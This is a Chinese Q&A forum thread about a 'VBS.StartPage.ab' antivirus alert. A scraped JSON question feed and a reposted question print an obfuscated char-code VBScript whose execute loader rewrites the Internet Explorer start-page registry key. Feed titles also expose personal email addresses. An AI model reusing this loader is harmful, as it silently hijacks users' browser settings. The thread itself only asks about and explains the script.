有网友知道VBS.StartPage.ab这个是什么病毒吗？

oO成Oo

有网友知道VBS.StartPage.ab这个是什么病毒吗？

我一直 是在参加http://zhidao.baidu.com/s/square/index.html?fr=toutu这个页面的活动

刚刚在回到百度知道里面的推荐的问题的时候
突然金山毒霸跳出这个弹窗
好像是中病毒了 不知道是咋回事 有网友了解吗？


样本

ADSLgg

临时文件
脚本病毒
修改主页

小涛5911

VBS病毒，该网页病毒修改用户的IE主页，默认的搜索主页，改为一个色情网址。同时病毒添加用户的收藏夹，在桌面创建该网址的快捷方式，并修改用户的hosts配置文件，将其注册在系统的环境变量中。

【乱】

Avg没报 解压双击就这东西~ 看不懂

======================
queslist.cbk({"status":0,"msg":"","data":{"count":4978583,"pn":180,"rn":20,"classid":74,"list":[{"qid":484285111,"title":"速度快一点的快播网站。 男人都懂的 发我邮箱越多越好。164964146@qq.com","cid":88,"content":"","reply_count":1,"score":50,"create_time":1349582049},{"qid":484285101,"title":"我的HTCG16不会使用键盘 发信息不知道怎么转换 上网聊天也不会打字 谁知道怎么用请告诉我 谢谢","cid":74,"content":"","reply_count":0,"score":0,"create_time":1349582047},{"qid":484285081,"title":"为什么我的IE8.0用不了了？","cid":89,"content":"","reply_count":0,"score":0,"create_time":1349582044},{"qid":484285028,"title":"德清武康镇的电信宽带如何办理？","cid":1074,"content":"","reply_count":0,"score":0,"create_time":1349582034},{"qid":484285003,"title":"谁有得意论坛的邀请码啊？可以发一个给我吗？麻烦发到这个邮箱：1007409681@qq.com 谢谢！","cid":88,"content":"","reply_count":0,"score":20,"create_time":1349582029},{"qid":484284967,"title":"逆战蓝砖积分有什么用","cid":88,"content":"","reply_count":0,"score":5,"create_time":1349582023},{"qid":484284944,"title":"高分悬赏 在线等无线路由器问题","cid":86,"content":"无线路由器设置好了，wan口一直显示正在连接中，线路没有问题，直接接电脑可以上，但是接路由器一直正在连接，mac也克隆了，还是这样。是什么原因，会不会路由器坏了。急啊.","reply_count":0,"score":20,"create_time":1349582018},{"qid":484284938,"title":"PS2 39001型厚机 插网卡连接IDE硬盘,开机就自动弹出光驱，同时光驱弹出键无效，拆掉网卡就正常。怎么办？","cid":86,"content":"","reply_count":0,"score":10,"create_time":1349582018},{"qid":484284923,"title":"为什么D8不换吧主","cid":767,"content":"","reply_count":1,"score":0,"create_time":1349582016},{"qid":484284905,"title":"red hat linux和windows系统有啥区别，有什么优点","cid":89,"content":"","reply_count":0,"score":0,"create_time":1349582013},{"qid":484284901,"title":"windows xp系统怎样更新？！","cid":89,"content":"自动更新总是出错。有简单点的方法吗？","reply_count":3,"score":5,"create_time":1349582013},{"qid":484284885,"title":"在宿舍里，买了路由器买了网线，交了钱，怎么链接上网？谢谢你啦","cid":88,"content":"","reply_count":4,"score":0,"create_time":1349582009},{"qid":484284874,"title":"笔记本打不开，也不是没有电，电源插上后充电指示灯是亮的，但就是开不了机。这是为什么呢","cid":86,"content":"前一个星期还是好的，今天拿出来再用，就这种情况了，是因为电源适配器的原因呢还是啥原因啊！","reply_count":1,"score":0,"create_time":1349582008},{"qid":484284829,"title":"求各位DIY高手，用华硕N55大人们给个意见","cid":872,"content":"我4月买的N55SL I7的，4G单条内存，现在想在加一条组成双通道，我看了他原来是三星DDR3 1333的，反正内存也不贵，我想换两条三星DDR3 1600的上去，不过听朋友说他默认频率是1333，加了1600他会自动降至1333，请亲们说说我怎么加好？","reply_count":3,"score":10,"create_time":1349582000},{"qid":484262366,"title":"C:\\sm.vbs C:\\one.sys是个什么东西？","cid":89,"content":"以下是sm.vbs 里面的东西~~ 帮我看看。这个是干什么的？ data=\"83,101,116,32,87,83,72,83,104,101,108,108,32,61,32,87,83,99,114,105,112,116,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,87,115,104,83,104,101,108,108,46,82,101,103,68,101,108,101,116,101,32,34,72,75,67,85,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34,13,10,87,83,72,83,104,101,108,108,46,82,101,103,87,114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34,44,34,104,116,116,112,58,47,47,49,50,51,46,115,111,103,111,117,46,99,111,109,47,63,50,49,49,55,57,34,13,10,87,115,99,114,105,112,116,46,113,117,105,116,13,10,87,83,99,114,105,112,116,46,83,108,101,101,112,32,53,48,48,49,13,10,87,83,99,114,105,112,116,46,83,108,101,101,112,32,50\"Function ChrData(Data)MyArray = Split(Data, \",\", -1, 1)For each OldData in MyArrayNewdata=NewData&chr(OldData)NextChrData=NewDataEnd Functionexecute Chrdata(data)","reply_count":3,"score":50,"create_time":1349578690},{"qid":484284803,"title":"有什么自动连续截视频图的软件吗？","cid":1069,"content":"截出来的图最好是大图高清！我想截取一部歌曲MV的所有图片。谢谢大家。","reply_count":0,"score":0,"create_time":1349581997},{"qid":484284798,"title":"求正确的C#计算器程序","cid":869,"content":"详细","reply_count":0,"score":0,"create_time":1349581997},{"qid":484284795,"title":"为什么尘埃3按了图标没反应？","cid":89,"content":"我昨天下了个尘埃3，能玩，尘埃2也能，但今天两个按了图标都没反应，怎么回事，别人说要安装Microsoft Games for Windows - LIVE，但是我昨天玩的时候没安装，在游戏里按home键就出来了。","reply_count":0,"score":5,"create_time":1349581996},{"qid":484284789,"title":"电脑能联网，但是其他设备不行，是什么原因？","cid":89,"content":"是这样的，我家有一台电脑和一台网络电视，上个月我把系统换成了WIN7的，然后有人来我家装了光纤，还把路由器设置好了，后来我嫌win7用着不爽，就换回了XP，又重新设置了路由器，然后就只有我家的电脑能联网了，哦，我没重新设置路由器时网络电视能联网的。谁能帮我解答下，实在感激不尽，没财富了，谢谢啊~~~","reply_count":1,"score":0,"create_time":1349581995},{"qid":484284783,"title":"我的ie9的历史记录是默认20天的 可历史里怎么只能看到一周的啊 怎么看以前的啊","cid":88,"content":"","reply_count":1,"score":5,"create_time":1349581995}]}})

virusdefender

1. 以下是sm.vbs 里面的东西~~ 帮我看看。这个是干什么的？ data="83,101,116,32,87,83,72,83,104,101,108,108,32,61,32,87,83,99,114,105,112,116,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,87,115,104,83,104,101,108,108,46,82,101,103,68,101,108,101,116,101,32,34,72,75,67,85,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34,13,10,87,83,72,83,104,101,108,108,46,82,101,103,87,114,105,116,101,32,34,72,75,67,85,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,73,110,116,101,114,110,101,116,32,69,120,112,108,111,114,101,114,92,77,97,105,110,92,83,116,97,114,116,32,80,97,103,101,34,44,34,104,116,116,112,58,47,47,49,50,51,46,115,111,103,111,117,46,99,111,109,47,63,50,49,49,55,57,34,13,10,87,115,99,114,105,112,116,46,113,117,105,116,13,10,87,83,99,114,105,112,116,46,83,108,101,101,112,32,53,48,48,49,13,10,87,83,99,114,105,112,116,46,83,108,101,101,112,32,50"Function ChrData(Data)MyArray = Split(Data, ",", -1, 1)For each OldData in MyArrayNewdata=NewData&chr(OldData)NextChrData=NewDataEnd Functionexecute

复制代码

有个人贴出一段代码，问是干什么用的，估计就是报的这个代码

代码很明显经过加密

以前我的杀毒软件也有过类似情况的报毒